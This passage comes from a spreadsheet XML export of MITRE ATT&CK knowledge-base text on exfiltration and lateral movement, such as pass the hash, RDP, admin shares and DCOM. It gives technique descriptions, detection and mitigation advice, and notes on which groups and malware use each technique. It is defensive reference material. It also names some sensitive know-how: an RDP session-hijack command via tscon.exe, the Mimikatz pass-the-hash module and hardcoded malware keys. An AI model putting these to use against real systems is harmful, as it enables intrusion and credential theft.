    <t>https://attack.mitre.org/wiki/Technique/T1048</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] can exfiltrate data via a DNS tunnel or email, separately from its C2 channel.[[CiteRef::Kaspersky ProjectSauron Full Report]]</t>
  </si>
  <si>
    <t>[[Software/S0095|FTP]] may be used to exfiltrate data separate from the main command and control protocol.[[CiteRef::Wikipedia FTP]]</t>
  </si>
  <si>
    <t>[[Software/S0037|HAMMERTOSS]] exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.[[CiteRef::FireEye APT29]]</t>
  </si>
  <si>
    <t>The [[Group/G0004|Ke3chang]] group has been known to compress data before exfiltration.[[CiteRef::Villeneuve et al 2014]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.[[CiteRef::Novetta Blockbuster RATs]]</t>
  </si>
  <si>
    <t>Exfiltration Over Command and Control Channel</t>
  </si>
  <si>
    <t>[[Software/S0034|NETEAGLE]] is capable of reading files over the C2 channel.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>User interface,Process monitoring</t>
  </si>
  <si>
    <t>Detection for command and control applies.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used.[[CiteRef::University of Birmingham C2]] ,</t>
  </si>
  <si>
    <t>Mitigations for command and control apply. Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware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command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1041</t>
  </si>
  <si>
    <t>[[Software/S0147|Pteranodon]] exfiltrates screenshot files to its C2 server.[[CiteRef::Palo Alto Gamaredon Feb 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] has compressed files before exfiltration using TAR and RAR.[[CiteRef::PWC Cloud Hopper April 2017]][[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium</t>
  </si>
  <si>
    <t>In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.</t>
  </si>
  <si>
    <t>Data loss prevention,File monitoring</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media are mounted. ,</t>
  </si>
  <si>
    <t>Presence of physical medium or device</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1052</t>
  </si>
  <si>
    <t>[[Group/G0004|Ke3chang]] transferred compressed and encrypted RAR files containing exfiltration through the established backdoor command and control channel during operations.[[CiteRef::Villeneuve et al 2014]]</t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>[[Software/S0136|USBStealer]] automatically exfiltrates collected files via removable media when an infected device is connected to the second victim after receiving commands from the first victim.[[CiteRef::ESET Sednit USBStealer 2014]]</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process use of network</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. ,</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities, scripts, or potentially malicious software that may be used to transfer data outside of a network,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</si>
  <si>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https://attack.mitre.org/wiki/Technique/T1020</t>
  </si>
  <si>
    <t>A [[Group/G0047|Gamaredon Group]] file stealer transfers collected files to a hardcoded C2 server.[[CiteRef::Palo Alto Gamaredon Feb 2017]]</t>
  </si>
  <si>
    <t>When a document is found matching one of the extensions in the configuration, [[Software/S0131|TINYTYPHON]] uploads it to the C2 server.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Software/S0050|CosmicDuke]] exfiltrates collected files automatically over FTP to remote servers.[[CiteRef::F-Secure Cosmicduke]]</t>
  </si>
  <si>
    <t>Adversaries can direct [[Software/S0031|BACKSPACE]] to upload files to the C2 Server.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] actors have compressed data into RAR files prior to exfiltration.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>Data Encrypted</t>
  </si>
  <si>
    <t>Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
Other exfiltration techniques likely apply as well to transfer the information out of the network, such as [[Technique/T1041|Exfiltration Over Command and Control Channel]] and [[Technique/T1048|Exfiltration Over Alternative Protocol]]</t>
  </si>
  <si>
    <t>Encryption software and encrypted files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known encryption utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used. Often the encryption key is stated within command-line invocation of the software. 
A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures. 
Network traffic may also be analyzed for entropy to determine if encrypted data is being transmitted.[[CiteRef::Zhang 2013]] If the communications channel is unencrypted, encrypted files of known file types can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers.[[CiteRef::Wikipedia File Header Signatures]] ,</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to encrypt files, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1022</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>[[Software/S0170|Helminth]] splits data into chunks up to 23 bytes and sends the data in DNS queries to its C2 server.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[CiteRef::University of Birmingham C2]] ,</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware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command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1030</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] actors have split RAR files for exfiltration into parts.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</t>
  </si>
  <si>
    <t>Exfiltration could occur over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel. Adversaries could choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.</t>
  </si>
  <si>
    <t>Processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a mouse click or key press) but access the network without such may be malicious. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1011</t>
  </si>
  <si>
    <t>Data, such as sensitive documents, may be exfiltrated through the use of automated processing or [[Technique/T1064|Scripting]] after being gathered during [[Collection]]. 
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [[Technique/T1041|Exfiltration Over Command and Control Channel]] and [[Technique/T1048|Exfiltration Over Alternative Protocol]].</t>
  </si>
  <si>
    <t>The [[Software/S0086|ZLib]] backdoor compresses communications using the standard Zlib compression library.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0136|USBStealer]] exfiltrates collected files via removable media from air-gapped victims.[[CiteRef::ESET Sednit USBStealer 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0035|SPACESHIP]] copies staged data to removable drives when they are inserted into the system.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Software/S0050|CosmicDuke]] exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers.[[CiteRef::F-Secure Cosmicduke]]</t>
  </si>
  <si>
    <t>Following data collection, [[Group/G0037|FIN6]] has compressed log files into a ZIP archive prior to staging and exfiltration.[[CiteRef::FireEye FIN6 April 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0045|ADVSTORESHELL]] exfiltrates data over the same channel used for C2.[[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>[[Software/S0150|POSHSPY]] uploads data in 2048-byte chunks.[[CiteRef::FireEye POSHSPY April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] contains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device.[[CiteRef::Kaspersky ProjectSauron Full Report]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has a tool that exfiltrates data over the C2 channel.[[CiteRef::FireEye Clandestine Fox]]</t>
  </si>
  <si>
    <t>[[Software/S0079|MobileOrder]] exfiltrates data to its C2 server over the same protocol as C2 communications.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0077|CallMe]] exfiltrates data to its C2 server over the same protocol as C2 communications.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can set its "beacon" payload to reach out to the C2 server on an arbitrary and random interval.  In addition it will break large data sets into smaller chunks for exfiltration.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1029</t>
  </si>
  <si>
    <t>After data is collected by [[Group/G0038|Stealth Falcon]] malware, it is exfiltrated over the existing C2 channel.[[CiteRef::Citizen Lab Stealth Falcon May 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0053|SeaDuke]] compressed data with zlib prior to sending it over C2.[[CiteRef::Mandiant No Easy Breach]]</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] has compressed data into password-protected RAR archives prior to exfiltration.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0052|CopyKittens]] uses ZPP, a .NET console program, to compress files with ZIP.[[CiteRef::ClearSky Wilted Tulip July 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has used tools to compress data before exfilling it. [[CiteRef::aptsim]]</t>
  </si>
  <si>
    <t>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</t>
  </si>
  <si>
    <t>[[Software/S0045|ADVSTORESHELL]] collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes.[[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>[[Software/S0010|Lurid]] can compress data before sending it.[[CiteRef::Villeneuve 2011]]</t>
  </si>
  <si>
    <t>extracted documents and bundled them into a RAR archive.[[CiteRef::Symantec Sowbug Nov 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] has used RAR to compress, encrypt, and password-protect files prior to exfiltration.[[CiteRef::SecureWorks BRONZE UNION June 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0045|ADVSTORESHELL]] compresses output data generated by command execution with a custom implementation of the Lempel?Ziv?Welch (LZW) algorithm.[[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, or some other network protocol. Different channels could include Internet Web services such as cloud storage.</t>
  </si>
  <si>
    <t>Data exfiltration is performed over the [[Command and Control]] channel.  Data is encoded into the normal communications channel using the same protocol as command and control communications.</t>
  </si>
  <si>
    <t>[[Group/G0006|APT1]] has used RAR to compress files before moving them outside of the victim network.[[CiteRef::Mandiant APT1]]</t>
  </si>
  <si>
    <t>[[Software/S0093|Backdoor.Oldrea]] writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server.[[CiteRef::Symantec Dragonfly]]</t>
  </si>
  <si>
    <t>[[Group/G0052|CopyKittens]] encrypts data with a substitute cipher prior to exfiltration.[[CiteRef::CopyKittens Nov 2015]]</t>
  </si>
  <si>
    <t>TRINITY malware used by [[Group/G0037|FIN6]] encodes data gathered from the victim with a simple substitution cipher and single-byte XOR using the OxAA key.[[CiteRef::FireEye FIN6 April 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0169|RawPOS]] encodes credit card data it collected from the victim with XOR.[[CiteRef::TrendMicro RawPOS April 2015]][[CiteRef::Visa RawPOS March 2015]][[CiteRef::Mandiant FIN5 GrrCON Oct 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0036|FLASHFLOOD]] employs the same encoding scheme as [[Software/S0035|SPACESHIP]] for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>Data [[Software/S0035|SPACESHIP]] copies to the staging area is compressed with zlib. Bytes are rotated by four positions and XOR'ed with 0x23.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Software/S0045|ADVSTORESHELL]] encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration.[[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] has compressed and encrypted data into password-protected RAR archives prior to exfiltration.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0004|Ke3chang]] is known to use RAR with passwords to encrypt data prior to exfiltration.[[CiteRef::Villeneuve et al 2014]]</t>
  </si>
  <si>
    <t>Data exfiltration may be performed only at certain times of day or at certain intervals.  This could be done to blend traffic patterns with normal activity or availability.
When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol.</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware IndiaIndia saves information gathered about the victim to a file that is uploaded to one of its 10 C2 servers.[[CiteRef::Novetta Blockbuster Loaders]]</t>
  </si>
  <si>
    <t>[[Software/S0078|Psylo]] exfiltrates data to its C2 server over the same protocol as C2 communications.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] actors have encrypted data for exfiltration using the password "admin-windows2014" (with the year corresponding to the year of the intrusion).[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>[[Software/S0072|OwaAuth]] DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>Lateral Movement</t>
  </si>
  <si>
    <t>Pass the Hash</t>
  </si>
  <si>
    <t>Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a [[Credential Access]] technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. 
Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.[[CiteRef::NSA Spotting]]</t>
  </si>
  <si>
    <t>Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious. ,</t>
  </si>
  <si>
    <t>Monitor systems and domain logs for unusual credential logon activity. Prevent access to [[Technique/T1078|Valid Accounts]]. Apply patch KB2871997 to Windows 7 and higher systems to limit the default access of accounts in the local administrator group. 
Enable pass the hash mitigations to apply UAC restrictions to local accounts on network logon. The associated Registry key is located &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy&lt;/code&gt; Through GPO: Computer Configuration &gt; [Policies] &gt; Administrative Templates &gt; SCM: Pass the Hash Mitigations: Apply UAC restrictions to local accounts on network logons.[[CiteRef::GitHub IAD Secure Host Baseline UAC Filtering]]
Limit credential overlap across systems to prevent the damage of credential compromise and reduce the adversary's ability to perform [[Lateral Movement]] between systems. Ensure that built-in and created local administrator accounts have complex, unique passwords. Do not allow a domain user to be in the local administrator group on multiple systems.</t>
  </si>
  <si>
    <t>Requires Microsoft Windows as target system</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1075</t>
  </si>
  <si>
    <t>Remote Desktop Protocol</t>
  </si>
  <si>
    <t>[[Group/G0057|APT34]] uses Remote Desktop Protocol for lateral movement. The group has also used tunneling tools to tunnel RDP into the environment.[[CiteRef::FireEye APT34 Webinar Dec 2017]]</t>
  </si>
  <si>
    <t>Authentication logs,Netflow/Enclave netflow,Process monitoring</t>
  </si>
  <si>
    <t>Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.
Also, set up process monitoring for &lt;code&gt;tscon.exe&lt;/code&gt; usage and monitor service creation that uses &lt;code&gt;cmd.exe /k&lt;/code&gt; or &lt;code&gt;cmd.exe /c&lt;/code&gt; in its arguments to prevent RDP session hijacking. ,</t>
  </si>
  <si>
    <t>Disable the RDP service if it is unnecessary, remove unnecessary accounts and groups from Remote Desktop Users groups, and enable firewall rules to block RDP traffic between network security zones. Audit the Remote Desktop Users group membership regularly. Remove the local Administrators group from the list of groups allowed to log in through RDP. Limit remote user permissions if remote access is necessary. Use remote desktop gateways and multifactor authentication for remote logins.[[CiteRef::Berkley Secure]] Do not leave RDP accessible from the internet. Change GPOs to define shorter timeouts sessions and maximum amount of time any single session can be active. Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server. [[CiteRef::Windows RDP Sessions]]</t>
  </si>
  <si>
    <t>User,Remote Desktop Users</t>
  </si>
  <si>
    <t>RDP service enabled, account in the Remote Desktop Users group.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1076</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] enables the Remote Desktop Protocol for persistence. [[CiteRef::aptsim]]</t>
  </si>
  <si>
    <t>Windows Admin Shares</t>
  </si>
  <si>
    <t>Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include &lt;code&gt;C$&lt;/code&gt;, &lt;code&gt;ADMIN$&lt;/code&gt;, and &lt;code&gt;IPC$&lt;/code&gt;. 
Adversaries may use this technique in conjunction with administrator-level [[Technique/T1078|Valid Accounts]] to remotely access a networked system over server message block (SMB)[[CiteRef::Wikipedia SMB]] to interact with systems using remote procedure calls (RPCs),[[CiteRef::TechNet RPC]] transfer files, and run transferred binaries through remote [[Execution]]. Example execution techniques that rely on authenticated sessions over SMB/RPC are [[Technique/T1053|Scheduled Task]], [[Technique/T1035|Service Execution]], and [[Technique/T1047|Windows Management Instrumentation]]. Adversaries can also use NTLM hashes to access administrator shares on systems with [[Technique/T1075|Pass the Hash]] and certain configuration and patch levels.[[CiteRef::Microsoft Admin Shares]]
The [[Software/S0039|Net]] utility can be used to connect to Windows admin shares on remote systems using &lt;code&gt;net use&lt;/code&gt; commands with valid credentials.[[CiteRef::Technet Net Use]]</t>
  </si>
  <si>
    <t>Process use of network,Authentication logs,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding.[[CiteRef::Lateral Movement Payne]][[CiteRef::Windows Event Forwarding Payne]] Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as [[Software/S0039|Net]], on the command-line interface and [[Discovery]] techniques that could be used to find remotely accessible systems. ,</t>
  </si>
  <si>
    <t>Do not reuse local administrator account passwords across systems. Ensure password complexity and uniqueness such that the passwords cannot be cracked or guessed. Deny remote use of local admin credentials to log into systems. Do not allow domain user accounts to be in the local Administrators group multiple systems.
Identify unnecessary system utilities or potentially malicious software that may be used to leverage SMB and the Windows admin shares, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>File and printer sharing over SMB enabled.
Host/network firewalls not blocking SMB ports between source and destination.
Use of domain account in administrator group on remote system or default system admin account.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1077</t>
  </si>
  <si>
    <t>Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).[[CiteRef::TechNet Remote Desktop Services]] There are other implementations and third-party tools that provide graphical access [[Technique/T1021|Remote Services]] similar to RDS.
Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use [[Credential Access]] techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [[Technique/T1015|Accessibility Features]] technique for [[Persistence]].[[CiteRef::Alperovitch Malware]]
Adversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, &lt;code&gt;c:\windows\system32\tscon.exe [session number to be stolen]&lt;/code&gt;, an adversary can hijack a session without the need for credentials or prompts to the user.[[CiteRef::RDP Hijacking Korznikov]] This can be done remotely or locally and with active or disconnected sessions.[[CiteRef::RDP Hijacking Medium]] It can also lead to [[Technique/T1018|Remote System Discovery]] and [[Privilege Escalation]] by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf.[[CiteRef::Kali Redsnarf]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can start a VNC-based remote desktop server and tunnel the connection through the already established C2 channel.</t>
  </si>
  <si>
    <t>[[Group/G0035|Dragonfly]] used RDP to connect to additional victims.[[CiteRef::US-CERT APT Energy Oct 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0051|FIN10]] has used RDP to move laterally to systems in the victim environment.[[CiteRef::FireEye FIN10 June 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0037|FIN6]] used RDP to move laterally in victim networks.[[CiteRef::FireEye FIN6 April 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware SierraCharlie uses RDP for propagation.[[CiteRef::Novetta Blockbuster RATs]]</t>
  </si>
  <si>
    <t>The [[Group/G0001|Axiom]] group is known to have used RDP during operations.[[CiteRef::Axiom]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] has used RDP connections to move across the victim network.[[CiteRef::PWC Cloud Hopper April 2017]]</t>
  </si>
  <si>
    <t>Distributed Component Object Model</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can deliver Beacon payloads for lateral movement by leveraging remote COM execution.[[CiteRef::
Cobalt Strike DCOM Jan 2017]]</t>
  </si>
  <si>
    <t>API monitoring,Authentication logs,DLL monitoring,Packet capture,Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>Monitor for COM objects loading DLLs and other modules not typically associated with the application.[[CiteRef::Enigma Outlook DCOM Lateral Movement Nov 2017]]
Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
Monitor for influx of Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic. ,</t>
  </si>
  <si>
    <t>Modify Registry settings (directly or using Dcomcnfg.exe) in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AppID_GUID}&lt;/code&gt; associated with the process-wide security of individual COM applications.[[CiteRef::Microsoft Process Wide Com Keys]]
Modify Registry settings (directly or using Dcomcnfg.exe) in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole&lt;/code&gt; associated with system-wide security defaults for all COM applications that do no set their own process-wide security.[[CiteRef::Microsoft System Wide Com Keys]][[CiteRef::Microsoft COM ACL]]
Consider disabling DCOM through Dcomcnfg.exe.[[CiteRef::Microsoft Disable DCOM]]
Enable Windows firewall, which prevents DCOM instantiation by default.
Ensure all COM alerts and Protected View are enabled.[[CiteRef::Microsoft Protected View]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1175</t>
  </si>
  <si>
    <t>[[Software/S0002|Mimikatz]]'s &lt;code&gt;SEKURLSA::Pth&lt;/code&gt; module can impersonate a user, with only a password hash, to execute arbitrary commands.[[CiteRef::Adsecurity Mimikatz Guide]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] will copy files over to Windows Admin Shares (like ADMIN$) as part of lateral movement. [[CiteRef::Symantec Buckeye]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can perform pass the hash.[[CiteRef::Cobalt Strike TTPs Dec 2017]]</t>
  </si>
  <si>
    <t>Shared Webroot</t>
  </si>
  <si>
    <t>Adversaries may add malicious content to an internally accessible website through an open network file share that contains the website's webroot or Web content directory and then browse to that content with a Web browser to cause the server to execute the malicious content. The malicious content will typically run under the context and permissions of the Web server process, often resulting in local system or administrative privileges, depending on how the Web server is configured.
This mechanism of shared access and remote execution could be used for lateral movement to the system running the Web server. For example, a Web server running PHP with an open network share could allow an adversary to upload a remote access tool and PHP script to execute the RAT on the system running the Web server when a specific page is visited.</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring</t>
  </si>
  <si>
    <t>Use file and process monitoring to detect when files are written to a Web server by a process that is not the normal Web server process or when files are written outside of normal administrative time periods. Use process monitoring to identify normal processes that run on the Web server and detect processes that are not typically executed. ,</t>
  </si>
  <si>
    <t>Networks that allow for open development and testing of Web content and allow users to set up their own Web servers on the enterprise network may be particularly vulnerable if the systems and Web servers are not properly secured to limit privileged account use, unauthenticated network share access, and network/system isolation.
Ensure proper permissions on directories that are accessible through a Web server. Disallow remote access to the webroot or other directories used to serve Web content. Disable execution on directories within the webroot. Ensure that permissions of the Web server process are only what is required by not using built-in accounts; instead, create specific accounts to limit unnecessary access or permissions overlap across multiple systems.</t>
  </si>
  <si>
    <t>Shared webroot directory on remote system</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1051</t>
  </si>
  <si>
    <t>[[Group/G0040|Patchwork]] attempted to use RDP to move laterally.[[CiteRef::Cymmetria Patchwork]]</t>
  </si>
  <si>
    <t>Lateral movement can be done with [[Software/S0039|Net]] through &lt;code&gt;net use&lt;/code&gt; commands to connect to the [[Windows admin shares]] on remote systems.[[CiteRef::Savill 1999]]</t>
  </si>
  <si>
    <t>The [[Group/G0006|APT1]] group is known to have used RDP during operations.[[CiteRef::FireEye PLA]]</t>
  </si>
  <si>
    <t>[[Software/S0029|PsExec]], a tool that has been used by adversaries, writes programs to the &lt;code&gt;ADMIN$&lt;/code&gt; network share to execute commands on remote systems.[[CiteRef::PsExec Russinovich]]</t>
  </si>
  <si>
    <t>Remote Services</t>
  </si>
  <si>
    <t>An adversary may use [[Technique/T1078|Valid Accounts]] to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.</t>
  </si>
  <si>
    <t>Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through [[Discovery]] techniques prior to attempting [[Lateral Movement]]. ,</t>
  </si>
  <si>
    <t>Limit the number of accounts that may use remote services. Use multifactor authentication where possible. Limit the permissions for accounts that are at higher risk of compromise; for example, configure SSH so users can only run specific programs. Prevent [[Credential Access]] techniques that may allow an adversary to acquire [[Technique/T1078|Valid Accounts]] that can be used by existing services.</t>
  </si>
  <si>
    <t>Active remote service accepting connections and valid credentials</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1021</t>
  </si>
  <si>
    <t>Application Deployment Software</t>
  </si>
  <si>
    <t>Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment.
Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.</t>
  </si>
  <si>
    <t>File monitoring,Process use of network,Process monitoring</t>
  </si>
  <si>
